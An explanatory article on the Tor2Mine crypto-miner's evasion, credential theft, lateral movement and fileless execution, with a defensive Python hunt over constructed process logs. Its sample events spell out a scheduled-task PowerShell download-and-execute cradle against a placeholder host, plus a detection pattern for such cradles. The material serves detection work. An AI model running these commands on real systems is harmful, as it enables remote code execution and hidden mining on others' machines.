Tor2Mine is a crypto-miner that hijacks the resources of compromised computers and uses them to mine Monero, one of the more popular cryptocurrencies. The threat has been active for at least two years, and over that period it has been continuously improved and equipped with new functionality. The latest Tor2Mine variants detected by researchers show improved detection-evasion capabilities, can spread automatically through a breached network, and are harder to eradicate completely from infected devices.

The new variants use a PowerShell script to disable selected malware protection products, execute the main miner payload, and attempt to harvest Windows administrator credentials, all at the same time. How Tor2Mine proceeds from there depends on whether the harvested credentials give it administrative privileges:

  1. If the crypto-miner has obtained administrative credentials, it uses them to establish privileged access and install its crypto-mining files on the system. It also uses those privileges to move laterally through the network, searching for suitable machines and installing its files on them.
  2. If it fails to obtain administrative privileges, it still executes its miner payloads. In this case, however, the miner is launched remotely and filelessly through commands run as scheduled tasks; the Tor2Mine components stay on a remote host rather than being written to the compromised system.

Tor2Mine also tries to ensure that it is the only such threat running on the network by executing several scripts designed specifically to kill the processes and tasks of competing crypto-miners and clipper malware. Clippers are malware that watch for cryptocurrency wallet addresses and substitute the legitimate wallet address in a transaction with one controlled by the attackers, so that the funds end up in an account under their control.
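Two of the behaviours described above leave recognisable traces in process-creation telemetry: the fileless path in item 2 (a scheduled task whose action is a PowerShell download cradle, later launched by the task scheduler host) and the competitor-kill scripts in the paragraph just above (a burst of `taskkill` / `Stop-Process` calls from one script host). The hunt below is an added example written for this page, not code from the researchers or from the malware; the Sysmon-style record layout, the process names, the URL, the 60-second window and the three-target threshold are all assumptions chosen for illustration.

```python
"""Hunt over constructed process-creation records for two behaviours the
article attributes to Tor2Mine: fileless remote PowerShell execution through
scheduled tasks, and a burst of kills aimed at rival miner/clipper processes.
Every record, process name, URL and threshold here is a constructed assumption
for illustration, not an indicator taken from the article."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style (Event ID 1) process-creation records (sample data).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    # (a) task creation whose action is a PowerShell download cradle
    {"time": "2021-12-01T10:00:00", "ppid": 4321, "parent": CMD,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn upd /sc minute /mo 5 /ru SYSTEM '
                '/tr "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)'
                ".DownloadString('http://example.invalid/a.ps1')\""},
    # (b) the task firing: the Schedule service host launches the cradle
    {"time": "2021-12-01T10:05:00", "ppid": 1100,
     "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                ".DownloadString('http://example.invalid/a.ps1')\""},
    # (c) benign interactive PowerShell: must not fire
    {"time": "2021-12-01T10:05:30", "ppid": 2200,
     "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -c Get-Process"},
    # (d) benign task creation running a local binary: must not fire
    {"time": "2021-12-01T10:06:00", "ppid": 4321, "parent": CMD,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn backup /sc daily /tr "C:\Tools\backup.exe"'},
    # (e) kill sweep: one script host (ppid 5555) hits several rivals in seconds
    {"time": "2021-12-01T10:05:02", "ppid": 5555, "parent": CMD,
     "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /f /im rivalmine.exe"},
    {"time": "2021-12-01T10:05:03", "ppid": 5555, "parent": CMD,
     "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /f /im otherminer.exe"},
    {"time": "2021-12-01T10:05:08", "ppid": 5555, "parent": CMD, "image": PS,
     "cmdline": "powershell -c Stop-Process -Name clipper,coinhog -Force"},
    # (f) a lone taskkill from an admin shell: must not fire
    {"time": "2021-12-01T11:00:00", "ppid": 7777, "parent": CMD,
     "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /f /im notepad.exe"},
]

# Markers of a remote, fileless PowerShell action: download cradles and encoded commands.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b"
    r"|-enc(?:odedcommand)?\b", re.I)
SCHED_HOSTS = {"svchost.exe", "taskeng.exe"}   # processes that launch task actions
SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_fileless_task_exec(events):
    """Return (time, reason, cmdline) for task creations carrying a PowerShell
    cradle and for cradles launched directly by the task scheduler host."""
    hits = []
    for ev in events:
        img, cmd = basename(ev["image"]), ev["cmdline"]
        if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and CRADLE.search(cmd):
            hits.append((ev["time"], "scheduled task created with remote/encoded PowerShell action", cmd))
        elif img in SHELLS and basename(ev["parent"]) in SCHED_HOSTS and CRADLE.search(cmd):
            hits.append((ev["time"], "PowerShell download cradle launched by task scheduler", cmd))
    return hits


def find_kill_sweeps(events, window=timedelta(seconds=60), min_targets=3):
    """Return (ppid, start_time, sorted targets) for parents that kill at least
    min_targets distinct process names within one window (assumed thresholds)."""
    by_parent = defaultdict(list)
    for ev in events:
        img, cmd = basename(ev["image"]), ev["cmdline"]
        targets = []
        if img == "taskkill.exe":
            targets = [t.lower() for t in re.findall(r"/im\s+(\S+)", cmd, re.I)]
        elif img in SHELLS:
            for grp in re.findall(r"stop-process\s+-name\s+([^\s|;]+)", cmd, re.I):
                targets += [t.strip("\"'").lower() for t in grp.split(",")]
        for t in targets:
            by_parent[ev["ppid"]].append((datetime.fromisoformat(ev["time"]), t))
    sweeps = []
    for ppid, kills in by_parent.items():
        kills.sort()
        for i, (t0, _) in enumerate(kills):           # slide the window over each start
            distinct = sorted({name for t, name in kills[i:] if t - t0 <= window})
            if len(distinct) >= min_targets:
                sweeps.append((ppid, t0.isoformat(), distinct))
                break                                  # one alert per parent is enough
    return sweeps


if __name__ == "__main__":
    for hit in find_fileless_task_exec(SAMPLE_EVENTS):
        print("FILELESS:", *hit)
    for sweep in find_kill_sweeps(SAMPLE_EVENTS):
        print("KILL SWEEP:", *sweep)
```

Grouping kills by parent PID rather than by user or host is what separates a scripted sweep from an administrator closing one stray process; the single benign `taskkill` in record (f) stays silent while the three commands from the same parent in (e) fire once. Because the fileless path never writes the miner to disk, the scheduled-task creation and the cradle spawned by `svchost.exe` are often the only host artefacts, which is why both are checked rather than only the task definition.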

Researchers note that if Tor2Mine is not removed from the network completely, it could continue to reinfect individual systems even if they have already been cleaned. 
